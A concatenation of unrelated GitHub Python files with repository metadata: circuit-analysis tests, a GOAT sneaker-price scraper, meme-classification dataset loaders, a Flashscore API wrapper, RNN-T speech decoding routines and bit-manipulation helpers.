functions. The attribute used is will_run.\n\n To run this test use: nosetests -a will_run test_prog_tf.py\n \"\"\"\n s = symbols('s')\n o, d = [1, 0, 2, 1], [0, 2, 3, 3]\n e, v = [\"R1\", \"R2\", \"R3\", \"V1\"], [0.2, 0.2, 0.2, 5]\n test_output = Matrix([[5.0, 0.0, 0.0], [0, 10.0, -5.0], [0.0, -5.0, 5.0]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 3)\n o, d = [1, 2, 3, 1], [2, 3, 0, 0]\n e, v = [\"R1\", \"L1\", \"C1\", \"V1\"], [5.0, 10.0, 1e-6, 5.0]\n test_output = Matrix([[0.2, -0.2, 0.0], [-0.2, 0.2+0.1/s, -0.1/s],\n [0.0, -0.1/s, 0.1/s+1e-6*s]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 3)\n o, d = [1, 2, 3, 3, 3, 1], [2, 3, 0, 0, 0, 0]\n e = [\"R1\", \"C1\", \"C2\", \"L1\", \"R2\", \"V1\"]\n v = [10.0, 1e-6, 1e-6, 10.0, 5.0, 5.0]\n test_output = Matrix([[0.1, -0.1, 0], [-0.1, 0.1+1e-6*s, -1e-6*s],\n [0, -1e-6*s, 2*s*1e-6+0.1/s+0.2]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 3)\n o, d = [1, 2, 2, 3, 3, 4, 1], [2, 3, 0, 0, 4, 0, 0]\n e = [\"R1\", \"R2\", \"L1\", \"C1\", \"R3\", \"R4\", \"V1\"]\n v = [10.0, 10.0, 10.0, 1e-6, 10.0, 10.0, 5.0]\n test_output = Matrix([[0.1, -0.1, 0, 0], [-0.1, 0.2+0.1/s, -0.1, 0],\n [0, -0.1, 0.2+1e-6*s, -0.1], [0, 0, -0.1, 0.2]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 4)\n\n\ndef test_voltage_matrix():\n \"\"\"\n Test the formation of the volatge matrix required for nodal analysis.\n\n One test case is constructed with two volatge sources, where one source is\n between ground(reference node) and node 1 and another voltage source is\n between nodes 2 and 3\n\n Again attribute will_run is added to this function\n \"\"\"\n o, d = [1, 3, 1, 2, 3], [2, 2, 0, 0, 0]\n e = [\"R1\", \"V1\", \"V2\", \"R2\", \"R3\"]\n (v, v_t, dep) = prog.set_volt_matrix(o, d, e)\n test_output = (Matrix([[0, -1], [1, 0], [-1, 0]]),\n Matrix([[0, -1, 1], [1, 0, 0]]), Matrix([[0, 0], [0, 0]]))\n assert(v, v_t, dep) == test_output\n\n\ndef test_output_tf_calc():\n \"\"\"\n Test output of the function output_tf_calc of prog_tf.py.\n\n This creates the appropriate netlist for a simple series RLC circuit\n with the following parameters.\n V = 10V\n R = 10ohms\n L = 0.01H\n C = 10^-6F\n Nodal analysis of the above circuit is done by hand and provided as sol\n to the function output_tf_calc. 
Different output parameters such as\n current through inductor, voltage across inductor, voltage across\n capacitor, voltage across voltage source is tested.\n\n Atrribute will_run is also attached to this test function\n \"\"\"\n s = symbols('s')\n sol = {}\n impedance = (s**2*1e-8+s*1e-5+1.0)/(s*1e-6)\n iv1, v1, v2 = symbols('I_V1'), symbols('V_1'), symbols('V_2')\n v3 = symbols('V_3')\n sol[iv1] = 10.0/impedance\n sol[v1], sol[v2] = 10.0, 10.0-100.0/impedance\n sol[v3] = 10.0-100.0/impedance-(s*0.1)/impedance\n o, d = [1, 2, 3, 1], [2, 3, 0, 0]\n ident, val = [\"R1\", \"L1\", \"C1\", \"V1\"], [10, 0.01, 1e-6, 10]\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"L1\", \"I\")\n assert(test_out) == sol[iv1]\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"L1\", \"V\")\n assert(test_out) == sol[iv1]*0.01*s\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"C1\", \"V\")\n assert(test_out) == sol[v3]\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"V1\", \"V\")\n assert(test_out) == 10.0\n\n\ndef test_nodal_matrix():\n \"\"\"Test the formation of the 3 matrices required for solving nodal analysis.\n\n A simple series RLC circuit is taken for testing\n \"\"\"\n s, V_1, V_2 = symbols('s'), symbols('V_1'), symbols('V_2')\n V_3, I_V1 = symbols('V_3'), symbols('I_V1')\n m = Matrix([[0.2, -0.2, 0.0, -1.0], [-0.2, 0.2+0.1/s, -0.1/s, 0.0],\n [0.0, -0.1/s, 0.1/s+1e-6*s, 0.0], [1.0, 0.0, 0.0, 0.0]])\n unknowns = Matrix([[V_1], [V_2], [V_3], [I_V1]])\n rhs = Matrix([[0.0], [0.0], [0.0], [5.0]])\n c = Matrix([[0.2, -0.2, 0.0], [-0.2, 0.2+0.1/s, -0.1/s],\n [0.0, -0.1/s, 0.1/s+1e-6*s]])\n v, v_t = Matrix([[-1.0], [0.0], [0.0]]), Matrix([[1.0, 0.0, 0.0]])\n n_nodes, n_voltsrc, val = 3, 1, [5.0, 10.0, 1e-6, 5.0]\n ele_type, dep = [\"R1\", \"L1\", \"C1\", \"V1\"], Matrix([[0.0]])\n u, mat, r = prog.nodal_matrix(c, v, val, v_t, n_nodes, n_voltsrc,\n ele_type, dep)\n assert(mat, u, r) == (m, unknowns, rhs)\n\n\ndef test_check_netlist_error():\n \"\"\"Test the function check_netlist_error of prog_tf.py.\"\"\"\n origin, dest = [1, -2, 3, 1], [-2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Negative value of node.\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [-10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Non-positive value of R/L/C\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 0]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Zero value\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"You have not entered all identifiers.\")\n\n origin, dest = [1, 2, 3, 1], [1, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, -10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Same value of origin and destination node\")\n\n origin, dest = [1, 2, 3, 10], [2, 3, 10, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Your circuit is not connected.\")\n\n 
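# the remaining cases cover a netlist with no ground reference node and one\n    # combining several faults, which the checker reports as multiple errors\n    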
origin, dest = [1, 2, 3, 4], [2, 3, 4, 1]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"No reference node\")\n\n origin, dest = [1, 2, 3, 4], [2, 3, 1, 4]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Multiple Errors\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, -10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (0, \"\")\n# Atrribute will_run is added to all the test functions\ntest_conductance_matrix.will_run = True\ntest_voltage_matrix.will_run = True\ntest_output_tf_calc.will_run = True\ntest_nodal_matrix.will_run = True\ntest_check_netlist_error.will_run = True\n","repo_name":"Soumya-dutta/SDES2016","sub_path":"tests/test_prog_tf.py","file_name":"test_prog_tf.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31460037376","text":"import json\nimport requests\nimport pprint\nfrom time import sleep\nimport random\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport proxyFinder\nimport csv\n\n\n#extracts all user-agents from the provided 'ua_file.txt' into a list then randomly selects a user-agent\ndef getUserAgent():\n randomUserAgent = \"\"\n listOfUserAgents = []\n userAgentFile = 'ua_file.txt'\n with open('ua_file.txt') as file:\n listOfUserAgents = [line.rstrip(\"\\n\") for line in file]\n return random.choice(listOfUserAgents)\n\n\nclass Sneaker:\n def __init__(self, name, query_id, retail_price, displayed_size, price, image_url):\n self.name = name\n self.query_id = query_id\n self.retail_price = retail_price\n self.displayed_size = displayed_size\n self.price = price\n self.image_url = image_url\n # self.sizeAndPrice = sizeAndPrice\n\n\n#function to get all sneakers from 'Shop All' page\ndef getAllSneakers():\n sneakersList = []\n #api call to retrieve sneaker details\n url = 'https://2fwotdvm2o-3.algolianet.com/1/indexes/*/queries'\n #size you want to look for:\n shoe_size = 8\n #data sent with POST request\n for page in range(0,5):\n form_data = {\n \"requests\": [{\n \"indexName\":\"product_variants_v2\",\n \"params\":\"\",\n \"highlightPreTag\" : \"\",\n \"highlightPostTag\": \"\",\n \"distinct\": \"true\",\n \"facetFilters\": [[\"presentation_size:\" + str(shoe_size)],[\"product_category:shoes\"]],\n \"maxValuesPerFacet\": 30,\n \"page\": page,\n \"facets\": [\"instant_ship_lowest_price_cents\",\"single_gender\",\"presentation_size\",\"shoe_condition\",\"product_category\",\"brand_name\",\"color\",\"silhouette\",\"designer\",\"upper_material\",\"midsole\",\"category\",\"release_date_name\"],\n \"tagFilters\":\"\"\n }]\n }\n query_params = {\n 'x-algolia-agent': 'Algolia for JavaScript (3.35.1); Browser (lite); JS Helper (3.2.2); react (16.13.1); react-instantsearch (6.8.2)',\n 'x-algolia-application-id': '2FWOTDVM2O',\n 'x-algolia-api-key': 'ac96de6fef0e02bb95d433d8d5c7038a'\n }\n response = requests.post(url, data=json.dumps(form_data), params=query_params).json()['results'][0]['hits']\n for sneaker in response:\n sneakersList.append(Sneaker(sneaker['name'], sneaker['slug'], sneaker['retail_price_cents']/100, sneaker['size'], sneaker['lowest_price_cents']/100, sneaker['original_picture_url'])) # 
setSneakerSizesAndPrices(sneaker['slug'])))\n # sleep(random.randrange(1,3))\n\n return sneakersList\n\n\ndef setSneakerSizesAndPrices(query_id):\n sizeAndPrice = {}\n url = 'https://www.goat.com/web-api/v1/product_variants'\n user_agent = getUserAgent()\n headers = {\n \"user-agent\": user_agent,\n \"accept\" : \"application/json\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\" : \"en-US,en;q=0.9\",\n \"referer\": 'https://www.google.com/'\n }\n\n query_params = {\n \"productTemplateId\": query_id\n }\n # proxy = proxyFinder.get_random_proxy()\n # proxies = {\n # \"http\": \"http://\" + proxy,\n # \"https\": \"https://\" + proxy\n # }\n\n # while True:\n for i in range(0, 10):\n try:\n headers.update({\"user-agent\": getUserAgent()})\n # proxies.update({\"http\": \"http://\" + proxyFinder.get_random_proxy(), \"https\": \"https://\" + proxyFinder.get_random_proxy()})\n # print(\"getting page with ip: \" + proxies['https'])\n response = requests.get(url, headers=headers, params=query_params, timeout=10)\n print(response.status_code)\n\n if(response.status_code >= 200 and response.status_code < 400):\n page = response.json()\n for i in range(0, len(page)):\n #check ONLY for new shoes with boxes in good condition\n if(page[i]['boxCondition'] == \"good_condition\" and page[i]['shoeCondition'] == \"new_no_defects\"):\n sizeAndPrice.update({page[i]['size']: page[i]['lowestPriceCents']['amount']/100})\n elif (response.json()['success'] == False): #catches if query_id invalid\n sizeAndPrice.update({\"message\": \"Invaid product id.\"})\n break\n else:\n raise PermissionError\n\n except (PermissionError):#request got blocked by captcha\n print(\"Unable to retrieve sneaker info...Retrying...\")\n # sleep(random.randrange(1,3)) #wait a while before retrying to avoid getting detected\n continue\n\n except requests.exceptions.Timeout as err:\n print(\"Request timed out...Retrying...\")\n continue\n\n else:\n break\n\n else: # if not sizeAndPrice:\n sizeAndPrice.update({\"Size_Timeout\": \"Price_Timeout\"})\n\n return sizeAndPrice\n\n\nif __name__ == \"__main__\":\n sneakers = getAllSneakers()\n sneakerData = {}\n nameList = []\n retailPriceList = []\n displayed_size = []\n price = []\n image_urls = []\n\n for sneaker in sneakers:\n nameList.append(sneaker.name)\n retailPriceList.append(sneaker.retail_price)\n displayed_size.append(sneaker.displayed_size)\n price.append(sneaker.price)\n image_urls.append(sneaker.image_url)\n # sizesAndPrices = sneaker.sizeAndPrice\n sneakerData.update({\"Name\": nameList, \"Retail Price\": retailPriceList, \"Display Size\": displayed_size, \"Price\":price})\n\n dataFrame = pd.DataFrame(sneakerData)\n dataFrame.to_csv(\"sneakers.csv\", index=False, header=True)\n print(dataFrame)\n\n # for sneaker in sneakers:\n # print(\"Name: \" + sneaker.name)\n # print(\"Retail Price: \" + str(sneaker.retail_price))\n # print(sneaker.sizeAndPrice)\n\n","repo_name":"Joseph1337/Sneaker_Scraper","sub_path":"goat_scraperV3.py","file_name":"goat_scraperV3.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33165760990","text":"import os\n\nimport pandas as pd\nimport torch\nfrom PIL import Image\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom torch.utils.data import Dataset\nfrom transformers import CLIPTokenizer, CLIPProcessor, AutoTokenizer\n\n\nclass HatefulMemesDataset(Dataset):\n def __init__(self, root_folder, image_folder, split='train', 
labels='original', image_size=224):\n super(HatefulMemesDataset, self).__init__()\n self.root_folder = root_folder\n self.image_folder = image_folder\n self.split = split\n self.labels = labels\n self.image_size = image_size\n self.info_file = os.path.join(root_folder, 'hateful_memes_expanded.csv')\n self.df = pd.read_csv(self.info_file)\n self.df = self.df[self.df['split']==self.split].reset_index(drop=True)\n float_cols = self.df.select_dtypes(float).columns\n self.df[float_cols] = self.df[float_cols].fillna(-1).astype('Int64')\n\n if split in ['test_seen', 'test_unseen']:\n self.fine_grained_labels = []\n elif self.labels == 'fine_grained':\n self.pc_columns = [col for col in self.df.columns if col.endswith('_pc') and not col.endswith('_gold_pc')]\n self.pc_columns.remove('gold_pc')\n self.attack_columns = [col for col in self.df.columns if col.endswith('_attack') and not col.endswith('_gold_attack')]\n self.attack_columns.remove('gold_attack')\n self.fine_grained_labels = self.pc_columns + self.attack_columns\n elif self.labels == 'fine_grained_gold':\n self.pc_columns = [col for col in self.df.columns if col.endswith('_gold_pc')]\n self.attack_columns = [col for col in self.df.columns if col.endswith('_gold_attack')]\n self.fine_grained_labels = self.pc_columns + self.attack_columns\n else:\n self.fine_grained_labels = []\n \n def __len__(self):\n return len(self.df)\n \n def __getitem__(self, idx):\n row = self.df.iloc[idx]\n item = {}\n image_fn = row['img'].split('/')[1]\n item['image'] = Image.open(f\"{self.image_folder}/{image_fn}\").convert('RGB').resize((self.image_size, self.image_size))\n item['text'] = row['text']\n item['label'] = row['label']\n item['idx_meme'] = row['id']\n item['idx_image'] = row['pseudo_img_idx']\n item['idx_text'] = row['pseudo_text_idx']\n item['caption'] = row['caption']\n\n if self.labels.startswith('fine_grained'):\n for label in self.fine_grained_labels:\n item[label] = row[label]\n\n return item\n\n\nclass TamilMemesDataset(Dataset):\n def __init__(self, root_folder, split='train', image_size=224):\n \"\"\"\n First, preprocess Tamil Troll Memes using `hateclipper/preprocessing/format_tamil_memes.ipynb`\n \"\"\"\n super(TamilMemesDataset, self).__init__()\n self.root_folder = root_folder\n self.split = split\n self.image_size = image_size\n self.info_file = os.path.join(root_folder, 'labels.csv')\n self.df = pd.read_csv(self.info_file)\n self.df = self.df[self.df['split']==self.split].reset_index(drop=True)\n self.fine_grained_labels = []\n \n def __len__(self):\n return len(self.df)\n \n def __getitem__(self, idx):\n row = self.df.iloc[idx]\n item = {}\n item['image'] = Image.open(f\"{self.root_folder}/{row['meme_path']}\").convert('RGB').resize((self.image_size, self.image_size))\n item['text'] = row['text']\n item['caption'] = row['text_transliterated'] # named as caption just to match the format of HatefulMemesDataset\n item['label'] = row['is_troll']\n\n return item\n\nclass PropMemesDataset(Dataset):\n def __init__(self, root_folder, split='train', image_size=224):\n super(PropMemesDataset, self).__init__()\n self.root_folder = root_folder\n self.split = split\n self.image_size = image_size\n self.info_file = os.path.join(root_folder, f'annotations/{self.split}.jsonl')\n self.df = pd.read_json(self.info_file, lines=True)\n self.fine_grained_labels = ['Black-and-white Fallacy/Dictatorship', 'Name calling/Labeling', 'Smears', 'Reductio ad hitlerum', 'Transfer', 'Appeal to fear/prejudice', \\\n 'Loaded Language', 'Slogans', 'Causal 
Oversimplification', 'Glittering generalities (Virtue)', 'Flag-waving', \"Misrepresentation of Someone's Position (Straw Man)\", \\\n                                    'Exaggeration/Minimisation', 'Repetition', 'Appeal to (Strong) Emotions', 'Doubt', 'Obfuscation, Intentional vagueness, Confusion', 'Whataboutism', 'Thought-terminating cliché', \\\n                                    'Presenting Irrelevant Data (Red Herring)', 'Appeal to authority', 'Bandwagon']\n        mlb = MultiLabelBinarizer().fit([self.fine_grained_labels])\n        self.df = self.df.join(pd.DataFrame(mlb.transform(self.df['labels']),\n                                            columns=mlb.classes_,\n                                            index=self.df.index))\n        \n    def __len__(self):\n        return len(self.df)\n    \n    def __getitem__(self, idx):\n        row = self.df.iloc[idx]\n        item = {}\n        item['image'] = Image.open(f\"{self.root_folder}/images/{row['image']}\").convert('RGB').resize((self.image_size, self.image_size))\n        item['text'] = \" \".join(row['text'].replace(\"\\n\", \" \").strip().lower().split())\n        item['labels'] = row[self.fine_grained_labels].values.tolist()\n        for label in self.fine_grained_labels:\n            item[label] = row[label]\n\n        return item\n\nclass CustomCollator(object):\n\n    def __init__(self, args, fine_grained_labels, multilingual_tokenizer_path='none'):\n        self.args = args\n        self.fine_grained_labels = fine_grained_labels\n        self.image_processor = CLIPProcessor.from_pretrained(args.clip_pretrained_model)\n        self.text_processor = CLIPTokenizer.from_pretrained(args.clip_pretrained_model)\n        if multilingual_tokenizer_path != 'none':\n            self.text_processor = AutoTokenizer.from_pretrained(multilingual_tokenizer_path)\n\n    def __call__(self, batch):\n        pixel_values = self.image_processor(images=[item['image'] for item in batch], return_tensors=\"pt\")['pixel_values']\n        if self.args.caption_mode == 'replace_text':\n            text_output = self.text_processor([item['caption'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n        elif self.args.caption_mode == 'concat_with_text':\n            text_output = self.text_processor([item['text'] + ' [SEP] ' + item['caption'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n        else:\n            text_output = self.text_processor([item['text'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n        \n        if self.args.dataset in ['original', 'masked', 'inpainted', 'tamil']:\n            caption_output = self.text_processor([item['caption'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n            labels = torch.LongTensor([item['label'] for item in batch])\n        if self.args.dataset in ['original', 'masked', 'inpainted']:\n            idx_memes = torch.LongTensor([item['idx_meme'] for item in batch])\n            idx_images = torch.LongTensor([item['idx_image'] for item in batch])\n            idx_texts = torch.LongTensor([item['idx_text'] for item in batch])\n\n        batch_new = {}\n        batch_new['pixel_values'] = pixel_values\n        batch_new['input_ids'] = text_output['input_ids']\n        batch_new['attention_mask'] = text_output['attention_mask']\n        if self.args.dataset in ['original', 'masked', 'inpainted', 'tamil']:\n            batch_new['input_ids_caption'] = caption_output['input_ids']\n            batch_new['attention_mask_caption'] = caption_output['attention_mask']\n            batch_new['labels'] = labels\n        if self.args.dataset in ['original', 'masked', 'inpainted']:\n            batch_new['idx_memes'] = idx_memes\n            batch_new['idx_images'] = idx_images\n            batch_new['idx_texts'] = idx_texts\n\n        if self.args.dataset in ['original', 'masked', 'inpainted', 'prop']:\n            #if self.args.labels.startswith('fine_grained'):\n            for label in self.fine_grained_labels:\n                batch_new[label] = 
torch.LongTensor([item[label] for item in batch])\n\n if self.args.dataset == 'prop':\n batch_new['labels'] = torch.LongTensor([item['labels'] for item in batch])\n\n return batch_new\n\n\n\ndef load_dataset(args, split):\n\n if args.dataset == 'original':\n image_folder = 'data/hateful_memes/img'\n elif args.dataset == 'masked':\n image_folder = 'data/hateful_memes_masked/'\n elif args.dataset == 'inpainted':\n image_folder = 'data/hateful_memes_inpainted/'\n \n if args.dataset == 'tamil':\n dataset = TamilMemesDataset(root_folder='data/Tamil_troll_memes', split=split, image_size=args.image_size)\n elif args.dataset == 'prop':\n dataset = PropMemesDataset(root_folder='data/propaganda-techniques-in-memes/data/datasets/propaganda/defaults', split=split, image_size=args.image_size)\n else:\n dataset = HatefulMemesDataset(root_folder='data/hateful_memes', image_folder=image_folder, split=split, \n labels=args.labels, image_size=args.image_size)\n\n return dataset\n","repo_name":"gokulkarthik/hateclipper","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"72398048693","text":"def func(n):\n if 'AB' not in n or 'BA' not in n:\n print('NO')\n return\n a = n.index('AB')\n b = n.index('BA')\n for i in range(a+2,len(n)-1):\n if n[i]+n[i+1] == 'BA':\n print('YES')\n return\n for i in range(b+2,len(n)-1):\n if n[i]+n[i+1] == 'AB':\n print('YES')\n return\n print('NO')\nn = input()\nfunc(n)","repo_name":"bijeshofficial/coding_solutions","sub_path":"CodeForces/550A.Two_Solutions.py","file_name":"550A.Two_Solutions.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1138050710","text":"import json\nfrom typing import List, Optional\n\nfrom . 
import converter\nfrom .base import Base\nfrom .country import Country\nfrom .match import Match\n\n\nclass FlashscoreApi(Base):\n def __init__(self, locale: str = 'en'):\n self.locale = locale\n super().__init__(self.locale)\n \n def get_countries(self) -> List[Country]:\n response = self.make_request(self._main_url)\n flashscore_html = response.text \n raw_data_start = flashscore_html.find('rawData: ') + len('rawData: ')\n raw_data_end = raw_data_start + flashscore_html[raw_data_start:].find('\\n') - 1\n\n json_data = json.loads(flashscore_html[raw_data_start:raw_data_end])\n countries = []\n for data in json_data:\n for country in data['SCC']:\n countries.append(Country(\n id=country['MC'],\n name=country['MCN'],\n url=f\"{self._main_url}{country['ML'][1:]}\",\n ))\n \n return sorted(countries, key=lambda country: country.id)\n\n def get_today_matches(self, day: Optional[int] = 0) -> List[Match]:\n today_matches_gzip = self.make_request(self._today_matches_url.replace('{day}', str(day)))\n today_matches_json = converter.gzip_to_json(today_matches_gzip.text)\n return [\n Match(id=today_match['AA'], locale=self.locale)\n for today_match in today_matches_json\n if today_match.get('AA') is not None\n ]\n\n def get_live_matches(self) -> List[Match]:\n today_matches_gzip = self.make_request(self._today_matches_url.replace('{day}', '0'))\n today_matches_json = converter.gzip_to_json(today_matches_gzip.text)\n\n return [\n Match(id=today_match['AA'], locale=self.locale)\n for today_match in today_matches_json\n if today_match.get('AA') is not None\\\n and today_match.get('AB') == '2'\n ]\n \n def get_matches_with_already_loaded_content(self, matches_ids: List[str]) -> List[Match]:\n matches = [ Match(id=id, locale=self.locale) for id in matches_ids ]\n urls = []\n for match in matches:\n urls += [\n match._flashscore_url, \n match._general_url,\n match._stats_url,\n match._events_url,\n match._odds_url,\n match._head2heads_url,\n ]\n for match, responses in zip(matches, self.split_list_to_chinks(self.make_grequest(urls), 6)):\n match.load_content(*[response.text for response in responses]) \n return matches\n","repo_name":"progeroffline/fs-football","sub_path":"flashscore/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40828287689","text":"import torch\nimport torch.nn.functional as F\n\n\ndef GreedyDecode(model, inputs, input_lengths):\n\n assert inputs.dim() == 3\n # f = [batch_size, time_step, feature_dim]\n f, _ = model.encoder(inputs, input_lengths)\n\n zero_token = torch.LongTensor([[0]])\n if inputs.is_cuda:\n zero_token = zero_token.cuda()\n results = []\n batch_size = inputs.size(0)\n\n def decode(inputs, lengths):\n log_prob = 0\n token_list = []\n gu, hidden = model.decoder(zero_token)\n for t in range(lengths):\n h = model.joint(inputs[t].view(-1), gu.view(-1))\n out = F.log_softmax(h, dim=0)\n prob, pred = torch.max(out, dim=0)\n pred = int(pred.item())\n log_prob += prob.item()\n if pred != 0:\n token_list.append(pred)\n token = torch.LongTensor([[pred]])\n if zero_token.is_cuda:\n token = token.cuda()\n gu, hidden = model.decoder(token, hidden=hidden)\n\n return token_list\n\n for i in range(batch_size):\n decoded_seq = decode(f[i], input_lengths[i])\n results.append(decoded_seq)\n\n return results\n\n\ndef BeamDecode(model, inputs, input_lengths):\n batch_size = inputs.size(0)\n\n enc_states, outputs_length = model.encoder(inputs, 
input_lengths)\n\n    zero_token = torch.LongTensor([[0]])\n    if inputs.is_cuda:\n        zero_token = zero_token.cuda()\n\n    def decode(enc_state, lengths, beam=10):\n        # each hypothesis keeps its emitted tokens, its cumulative log-probability\n        # and the decoder output/hidden state that produced it\n        dec_state, hidden = model.decoder(zero_token)\n        hyps = [{'tokens': [], 'score': 0.0, 'de_out': dec_state, 'de_hidden': hidden}]\n\n        for t in range(lengths):\n            hyps_best_kept = []\n            for hyp_old in hyps:\n                logits = model.joint(enc_state[t].view(-1), hyp_old['de_out'].view(-1))\n                out_probs = F.log_softmax(logits, dim=0).detach()\n                local_best_scores, local_best_ids = torch.topk(out_probs, min(beam, out_probs.size(0)))\n\n                for score, pred in zip(local_best_scores, local_best_ids):\n                    pred = int(pred.item())\n                    new_hyp = {'tokens': hyp_old['tokens'][:],\n                               'score': hyp_old['score'] + score.item(),\n                               'de_out': hyp_old['de_out'],\n                               'de_hidden': hyp_old['de_hidden']}\n                    if pred != 0:\n                        # non-blank prediction: emit the token and advance the decoder\n                        new_hyp['tokens'].append(pred)\n                        token = torch.LongTensor([[pred]])\n                        if enc_state.is_cuda:\n                            token = token.cuda()\n                        new_hyp['de_out'], new_hyp['de_hidden'] = model.decoder(token, hidden=hyp_old['de_hidden'])\n                    hyps_best_kept.append(new_hyp)\n\n            # prune to the `beam` best hypotheses before moving to the next frame\n            hyps = sorted(hyps_best_kept,\n                          key=lambda x: x['score'],\n                          reverse=True)[:beam]\n\n        return hyps[0]['tokens']\n\n    results = []\n    for i in range(batch_size):\n        decoded_seq = decode(enc_states[i], outputs_length[i])\n        results.append(decoded_seq)\n\n    return results\n","repo_name":"jhvmhg/rnnt","sub_path":"src/utils/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"2131352046","text":"#\r\n# Copyright (c) 2022 Andrew Lehmer\r\n#\r\n# Distributed under the MIT License.\r\n#\r\n\r\nfrom __future__ import annotations\r\nfrom collections.abc import Generator\r\nfrom typing import Literal\r\n\r\nIntGenerator = Generator[int, None, None]\r\n\r\ndef bits(x: int) -> IntGenerator:\r\n    \"\"\"Generates an int with one bit set for each bit set in x.\r\n    \r\n    >>> list(bits(42))\r\n    [2, 8, 32]\r\n    >>> [hex(bit) for bit in bits(0xbad)]\r\n    ['0x1', '0x4', '0x8', '0x20', '0x80', '0x100', '0x200', '0x800']\r\n    \"\"\"\r\n    mask = 1\r\n    while mask <= x:\r\n        if mask & x:\r\n            yield mask\r\n        mask <<= 1\r\n\r\ndef bit_indices(x: int, start: Literal[0, 1] = 0) -> IntGenerator:\r\n    \"\"\"Generates the bit index for each set bit in x where the index of the LSB\r\n    is start.\r\n    \r\n    >>> list(bit_indices(42))\r\n    [1, 3, 5]\r\n    >>> list(bit_indices(0x69, 1))\r\n    [1, 4, 6, 7]\r\n    \"\"\"\r\n    index = start\r\n    mask = 1\r\n    while mask <= x:\r\n        if mask & x:\r\n            yield index\r\n        index += 1\r\n        mask <<= 1\r\n\r\ndef ffs(x: int) -> int:\r\n    \"\"\"Finds the position of the first set bit in x or -1 if no bits are set.\r\n    \r\n    >>> ffs(42)\r\n    1\r\n    >>> ffs(0xb00)\r\n    8\r\n    \"\"\"\r\n    bit = 0\r\n    mask = 1\r\n    while mask <= x:\r\n        if mask & x:\r\n            return bit\r\n        bit += 1\r\n        mask <<= 1\r\n    return -1\r\n\r\ndef fsb(x: int) -> int:\r\n    \"\"\"Returns the value of the first set bit in x or 0 if no bits are set.\r\n    \r\n    >>> fsb(42)\r\n    2\r\n    >>> fsb(0x88)\r\n    8\r\n    \"\"\"\r\n    mask = 1\r\n    while mask <= x:\r\n        if mask & x:\r\n            return mask\r\n        mask <<= 1\r\n    return 0\r\n\r\ndef mask(length: int) -> int:\r\n    \"\"\"Returns a bit mask with length LSBs set.\r\n    \r\n    >>> mask(5)\r\n    31\r\n    \"\"\"\r\n    return (1 << length) - 1\r\n\r\ndef mtz(x: int) -> int:\r\n    \"\"\"Returns a mask of the trailing zero bits in x.\r\n    \r\n    >>> mtz(0x38)\r\n    7\r\n    >>> mtz(1)\r\n    0\r\n    \"\"\"\r\n    return fsb(x) - 1 if x else 0\r\n\r\ndef popcount(x: int) -> int:\r\n    \"\"\"Returns the number of set bits in x.\r\n    \r\n  